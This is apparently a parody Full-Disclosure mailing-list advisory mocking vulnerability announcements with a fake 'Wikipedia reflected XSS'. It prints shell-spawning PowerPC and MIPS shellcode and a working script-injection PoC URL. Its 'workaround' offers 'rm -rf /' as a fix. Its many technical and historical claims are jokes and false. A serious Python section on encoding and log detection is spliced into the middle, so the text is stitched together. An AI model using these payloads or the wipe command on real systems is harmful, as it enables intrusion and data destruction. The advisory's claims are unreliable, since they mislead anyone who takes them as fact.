
[Full-disclosure] [RingoBingo Secuity] Wikipedia Reflected XSS (Unresponsive-Conpulsive Disclosure)

ringobingohush.ai
Date: Wed Sep 08 2010 - 17:03:21 CDT


RingoBingo TM Security Advisory 09.08.10
http://labs.ringobingo.net/intelligence/vulnerabilities/
Sep 8, 2010

I. BACKGROUND

RingoBingo Secuity TM has been finally acquired by Hewlatt Pachard TM
for ~11.5M this weekend in a secret meeting in a location near Hanover
Street. The sign has been placed on Sunday 12:45 GGM+1,5.

The IP agreements between parties require RingoBingo TM to perform
Unresponsive-Conpulsive Disclosure of undisclosed cyber-arms to prevent
improper dissemination of Copyrights and Other Things TM on the web.
While aware that there are many employees of the Internet with the sole
scope of Internet washing, it's of primary importance to disseminate
this information to prevent proper exploitation by multiple parties and
to reduce the global exposure.

Hewlatt Pachard TM analysts also demonstrated how it's possible to
reduce energy consumption by increasing the global threatcon, as red
colors consume less power to be displayed than green or yellow/orange
ones.

II. DESCRIPTION

Wikipedia TM software contains code written by an intern of Hewlatt
Pachard TM and contains undocumented vulnerabilities. Since here at
RingoBingo Secuity TM we handle man pages and documentation errors as
security issues, we urge all the involved, uninvolved and retroinvolved
(as well as the underinvolved/underdesk ones) parties to patch their
man pages by adding the string "-enable-write18" to the parameter list
of Wikipedia TM.

During a 53-day-long penetration test, and for the sole purpose of a
proof of concept, our security team was able to successfully access
more than 3,400,000 internal pages of the Wikipedia TM system, if we
only consider the English-language subsystem. It can be seen that only
drastic measures can prevent a large-scale leakage. Moreover we think
that, if correctly exploited, this vulnerability can potentially make
the core content of the Wikipedia (TM) system world-writable, *even
without the need of a privilege escalation*, with easily foreseeable
consequences.

III. ANALYSIS

The vulnerability is present in different Wikipedia PHP files. Let's
analyze one of them. By reverse engineering the file, we have the
following asm code:

  7c0802a6 mfspr r0,LR
  9421fbb0 stu SP,-1104(SP)
  90010458 st r0,1112(SP)
  3c60f019 cau r3,r0,0xf019
  60632c48 lis r3,r3,11336
  90610440 st r3,1088(SP)
  3c60d002 cau r3,r0,0xd002
  60634c0c lis r3,r3,19468
  90610444 st r3,1092(SP)
  3c602f62 cau r3,r0,0x2f62
  6063696e lis r3,r3,26990
  90610438 st r3,1080(SP)
  3c602f73 cau r3,r0,0x2f73
  60636801 lis r3,r3,26625
  3863ffff addi r3,r3,-1
  9061043c st r3,1084(SP)
  30610438 lis r3,SP,1080
  7c842278 xor r4,r4,r4
  80410440 lwz RTOC,1088(SP)
  80010444 lwz r0,1092(SP)
  7c0903a6 mtspr CTR,r0
  4e800420 bctr

RingoBingo EST (Elite Security Team) was aware of the vulnerability and
took the situation in hand. The team started to find a way to subvert
the application and reverse engineered the code again, obtaining the
following:

  sub $9,$9,$9
  add $29,$29,-444
  sw $9,444($29)
  add $29,$29,444
  add $29,$29,-4
  lui $8,0x2f2f
  ori $8,$8,0x7368
  addi $29,$29,-444
  sw $8,444($29)
  addi $29,$29,444
  addi $29,$29,-4
  lui $8,0x2f62
  ori $8,$8,0x696e
  addi $29,$29,-444
  sw $8,444($29)
  addi $29,$29,444
  addi $29,$29,-4
  sw $29,444($29)
  lw $4,444($29)
  addi $4,$4,460
  addi $4,$4,-456
  sub $9,$9,$9
  addi $29,$29,-444
  sw $9,444($29)
  addi $29,$29,444
  addi $29,$29,-444
  sw $4,440($29)
  sw $29,436($29)
  lw $5,436($29)
  addi $5,$5,440
  sub $9,$9,$9
  andi $6,$9,0xffff
  li $2,1059
  syscall

THIS was the final and easy to read code that RingoBingo EST was
looking for. One of the interns of the RingoBingo EST recognized this
code; he wrote it during a hard-toilet session in his house at Long
Beach, and was surprised that his code was used in Wikipedia PHP
scripts. He noticed some slight differences between this and his
original code, as you can see by these lines:

  sw $9,444($29)
  addi $29,$29,444
  addi $29,$29,-444
  sw $4,440($29)
  sw $29,436($29)

The execution flow is modified by some external influences that will
cost the developer 9,444 US dollars. Again, the math got some
miscalculations, as 444 was first added and then subtracted (-444). By
adding a multiplicative factor of 4,440 we will obtain the total amount
to pay: 29,436 US fuckin' dollars.

This is a very very uncommon, critical and hard to exploit
vulnerability. Our top researchers worked on this for 15'000 days, 24/7,
to produce a working and very user unfriendly PoC that allows command
execution with root privileges in the context of a little circle printed
on a little paper in an anonymous Panama's mailbox. Here's the PoC:

http://en.m.wikipedia.org/wiki?search=%27%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
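Underneath the parody, the PoC above is an ordinary reflected XSS: the
value of the search parameter is echoed into the page without output
encoding, so the leading quote and angle bracket close whatever
attribute and tag surround it and the script element that follows is
rendered. The Python below is an added example, not code from the
advisory and not Wikipedia's or MediaWiki's own code. It decodes the
advisory's PoC URL, puts a constructed unencoded echo next to an
entity-encoded one, and runs a decode-then-match check over constructed
access-log lines so a defender can spot the same payload in request
logs. The render functions, the log lines and the marker regex are
assumptions made for illustration.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The advisory's PoC URL, reassembled from the post (the line wrap had split "123").
POC_URL = ("http://en.m.wikipedia.org/wiki?search="
           "%27%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E")


def search_term(url):
    """Return the percent-decoded value of the 'search' query parameter, or ''."""
    query = urlsplit(url).query
    return parse_qs(query).get("search", [""])[0]


def render_unsafe(term):
    """Constructed vulnerable pattern (illustrative, not MediaWiki's code):
    the term goes straight into an attribute, so a quote ends the attribute,
    '>' ends the tag and the rest is parsed as markup."""
    return '<input name="search" value="%s">' % term


def render_safe(term):
    """Same echo with HTML entity encoding: quotes and angle brackets become
    entities, so the browser treats the whole term as attribute text."""
    return '<input name="search" value="%s">' % html.escape(term, quote=True)


# Constructed access-log lines in combined-log style. The second carries the
# advisory's payload, the third a double-encoded variant of a script tag.
LOG_LINES = [
    '203.0.113.5 - - [08/Sep/2010:17:03:21 -0500] "GET /wiki?search=Hanover+Street HTTP/1.1" 200 5120',
    '203.0.113.7 - - [08/Sep/2010:17:03:22 -0500] "GET /wiki?search='
    '%27%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E HTTP/1.1" 200 5180',
    '203.0.113.9 - - [08/Sep/2010:17:03:23 -0500] "GET /wiki?search=%253Cscript%253E HTTP/1.1" 200 5100',
]

_REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Assumed marker set: script tags, inline event handlers, javascript: URLs.
_XSS = re.compile(r"<\s*script|\bon\w+\s*=|javascript:", re.IGNORECASE)


def normalise(path, rounds=2):
    """Percent-decode repeatedly (bounded) so double-encoded payloads are visible."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def flag_log_lines(lines):
    """Return the request paths whose decoded form carries a script-injection marker."""
    hits = []
    for line in lines:
        m = _REQ.search(line)
        if m and _XSS.search(normalise(m.group(1))):
            hits.append(m.group(1))
    return hits


if __name__ == "__main__":
    term = search_term(POC_URL)
    print("decoded term :", term)
    print("unsafe render:", render_unsafe(term))
    print("safe render  :", render_safe(term))
    print("flagged      :", flag_log_lines(LOG_LINES))
```

Run it directly to print the decoded term, both renders and the flagged
paths. The log check decodes twice before matching, which is why the
double-encoded third line is caught as well as the advisory's payload;
it only tells you someone is probing the parameter. The fix is the
output-side encoding shown in render_safe, applied wherever the term is
reflected.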

IV. DETECTION

Detection of this vulnerability is pretty easy. You have to wait for
moonlight and hope that it's a full moon night. Then, you need some
new-technology 3D glasses to identify monitor interferences caused by
this vulnerability. Once equipped with this technology, you have to
count all the prime numbers from 1 to 31337 in Chinese (Wikipedia IS
international), and perform a mind-race-condition on repeating the last
prime number 1-3 thousand times. If this mind-race-condition occurs, you
will be able to find the vulnerable PHP scripts on Wikipedia. Oh, I
forgot the last condition: you need to sleep while performing these
actions. Otherwise your neural waves will interfere with the monitor
frequencies and the second step of this detection (3D glasses) will
fail. That's it.

V. WORKAROUND

Simply shut down your services. Our proven and tested technology called
"Book" can protect your assets and your clients.

Update if you are in the +5 timezone: The following commands will fix
the vulnerability, meanwhile the vendor is producing the proper patch:

ssh rootwikipedia.org
<enter password when prompted>
rm -rf / & disown

VI. VENDOR RESPONSE

We don't believe in responses. We believe in under-deep security and
proactive man page reading.

VII. CVE INFORMATION

VIII. DISCLOSURE TIMELINE

217921.676106 - Man page iSCSI access in read-only
217921.681169 - First I/O error (seek is high, high, high)

At this point HAL was shut down.

April 3rd, 0033, 05:55:23 - Sent a mail to vendor but the grave was
empty, he resurrected

October 10th, 1492, 12:56:22 - Sent a mail to American Headquarters but
they didn't understand English

July 28th, 1914, 19:12:59 - Sent a mail to European Headquarters but
First World War started

July 1st, 2001, 13:23:53 - Sent a mail to actual vendor, but product
(Wikipedia) was not released yet

May 14th, 2045, 22:19:23 - Sent a mail to vendor, with a time machine

May 15th, 2045, 22:19:22 - Vendor response, fix ready

September 9th, 2010, 01:13:23 - Came back to the present and advisory
released

You are free to hack until May 15th 2045... enjoy the freshness!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/